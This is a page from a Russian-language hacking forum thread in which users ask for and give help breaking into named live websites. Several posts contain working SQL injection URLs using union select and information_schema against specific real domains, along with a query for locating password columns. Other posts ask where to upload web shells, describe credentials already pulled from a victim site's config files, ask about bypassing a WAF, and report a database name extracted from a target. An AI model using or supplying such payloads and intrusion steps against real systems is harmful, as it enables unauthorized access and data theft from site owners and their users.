Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Sc0rpi0n

    Sc0rpi0n Banned

    Joined:
    23 Feb 2010
    Messages:
    75
    Likes Received:
    22
    Reputations:
    16
    ты чё КЭП??

    смотри внимательно на мой линк. до этого момент я сам разобрался. проблема в +from+information_schema.tables+
     
  2. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,037
    Likes Received:
    531
    Reputations:
    935
    Code:
    http://ironmiketyson.ru/article_read.php?id=(0)union(select(1),2,3,(select(table_name)from(information_schema.columns)limit+1))--+
    Иногда, достаточно просто подумать.
     
    _________________________
  3. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    461
    Likes Received:
    62
    Reputations:
    26
    Такой вопрос...
    Вообщем Есть скуль и есть возможность четения файлов File_Priv = Y
    На самом сайте не могу найти директорию для что бы залить файл... там же есть
    SquirrelMail version 1.4.15
    Нашол директорию где он лежит...
    Подскажите мб кто знает какие папки в этом SquirrelMail есть что бы в них залить шелл?
     
  4. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    Заливай в /tmp и ищи инклюд.
     
    1 person likes this.
  5. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    461
    Likes Received:
    62
    Reputations:
    26
    нет инклуда = \
    На сайте есть phpmyadmin, Логины и пассы к бд повыдирал из конфигов... но на pma стоит вебавторизация, логины и пассы от бд не подходят = \ .htaccess, .htpasswd в директории пма нет или же я не могу прочитать их там) хотя визде htacces читается!
     
    #17305 GroM88, 9 Jul 2011
    Last edited: 9 Jul 2011
  6. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    942
    Likes Received:
    817
    Reputations:
    605
    а поискать конфиг не?

    https://forum.antichat.ru/thread49775.html
     
    _________________________
  7. sam367

    sam367 New Member

    Joined:
    18 Sep 2005
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Помогите разобраться с уязвимостью

    http://moon-land.ru/index.php?f=news&page=http://www.google.fr/webhp%3f%3Cbalisexss%3E%22%27
    нашел уязвимость, не могу ее заюзать, помогите.
     
  8. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    Инъекция есть, но раскрутить не удастся.
     
  9. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,037
    Likes Received:
    531
    Reputations:
    935
    Там нет уязвимости
     
    _________________________
  10. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    461
    Likes Received:
    62
    Reputations:
    26
    Ты бы мне шептанул какой конфиг искать?)
    P.S. Этим топиком постоянно пользуюсь )
     
  11. Sloneny

    Sloneny New Member

    Joined:
    8 Mar 2010
    Messages:
    23
    Likes Received:
    2
    Reputations:
    0
    Вопрос про способ заливки шелла:)
    Есть вот такой тип админки, http://www.whatshappening.sg/admin

    В ТЕМЕ НЕЛЬЗЯ ПОСТИТЬ ЛОГИНЫ И ПАРОЛИ ВО ИЗБЕЖАНИЕ ДЕФЕЙСОВ

    прошу прощения,
    тогда вот ссылка на продукт(календарь Helios Calendar )
    http://www.refreshmy.com/documentation/?title=Helios
    может кто сталкивался с таким?

    Как ни старался, не могу придумать как залить туда шелл:(
    Требуется помощь.
     
    #17311 Sloneny, 11 Jul 2011
    Last edited: 11 Jul 2011
  12. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    72
    Likes Received:
    6
    Reputations:
    -1
    помогите заюзать скулю, чет у меня не пляшет ниче
    http://www.czechstreets.com/?p=tour&start=5'
     
  13. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    Заюзать скулю, не удастся
     
  14. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    72
    Likes Received:
    6
    Reputations:
    -1
    почему??
    там в конец кода каким то чудесним образом попадает 7, как ее убрать??
     
  15. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,037
    Likes Received:
    531
    Reputations:
    935
    Там нет уязвимости, переменная start попадает в значение LIMIT, а LIMIT в свою очередь стоит после ORDER BY. В таком варианте провести инъекцию не возможно.
     
    _________________________
  16. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,588
    Likes Received:
    405
    Reputations:
    196
    http://urban-alumni.asci.org.in/news-details.php?id=16+union+select+1,2,3,5,6--

    Есть че для обхода WAF?
     
  17. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,417
    Likes Received:
    815
    Reputations:
    848
    прогнался ручками не че не получается, запустил в хэвиджь определил как блинд и подобрал БД, дальше не стал крутить...

    P.S.: DB: fullhyd_ascicug
     
    _________________________
    #17317 winstrool, 13 Jul 2011
    Last edited: 13 Jul 2011
  18. Sc0rpi0n

    Sc0rpi0n Banned

    Joined:
    23 Feb 2010
    Messages:
    75
    Likes Received:
    22
    Reputations:
    16
    Такая ситуация. если оч много таблиц в бд. а мне надо вывести таблицы типа users, passwords. они могу похоже называтся. я забыл как там при помощи LIKE вывести таблицу название похожее например на passwords
     
  19. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,037
    Likes Received:
    531
    Reputations:
    935
    PHP:
    SELECT column_name FROM information_schema.columns WHERE column_name LIKE '%pas%'
     
    _________________________
    1 person likes this.
  20. expupkin

    expupkin New Member

    Joined:
    15 Jan 2010
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Часто натыкабсь на такие ошибки , скажите есть тут уязвимость или нет ? И если есть то как её использовать ?

    HTML:
    http://engineer.asu.edu/feed-item?page=7
     
Loading...
Thread Status:
Not open for further replies.